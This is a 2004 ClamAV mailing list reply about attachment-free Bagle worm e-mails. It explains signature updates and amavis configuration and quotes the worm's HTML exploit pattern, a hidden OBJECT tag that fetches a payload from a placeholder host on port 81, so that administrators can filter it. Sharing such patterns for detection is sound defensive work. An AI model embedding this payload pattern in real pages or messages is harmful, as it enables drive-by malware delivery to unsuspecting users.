> -----Original Message----- > From: [EMAIL PROTECTED] [mailto:clamav-users- > [EMAIL PROTECTED] On Behalf Of jef moskot > Sent: 18. marts 2004 12:52 > To: [EMAIL PROTECTED] > Subject: [Clamav-users] attachment-free worms > > Based on what this article says, it looks like there will soon be problems > with my config: http://www.sophos.com/virusinfo/articles/bagletwist.html > > I wasn't able to get my version of amavis properly patched to submit the > body of the message to clam (or at least as far as I can tell, that's not > what's happening). >
A signature to detect these e-mails was added through daily.cvd version 194, so I guess you must patch your amavis setup so ClamAV is allowed to scan the raw e-mail. These e-mails contain nothing but a HTML exploit. If you're able to filter HTML somewhere else this is what you should go after: ---snip--- <font face="System"> <OBJECT STYLE="display:none" DATA="http://IP_ADDR:81/NUMBERS.php";> </OBJECT> ---snip--- IP_ADDR = an IP address NUMBERS = variable length of numbers from 0-9 Line breaks = CR/LF (hex: 0xOD 0x0A) And there will probably also be some HTML tags around this. Last resort would be to prevent users at your network from reaching TCP port 81. Best regards, Diego d'Ambra
smime.p7s
Description: S/MIME cryptographic signature
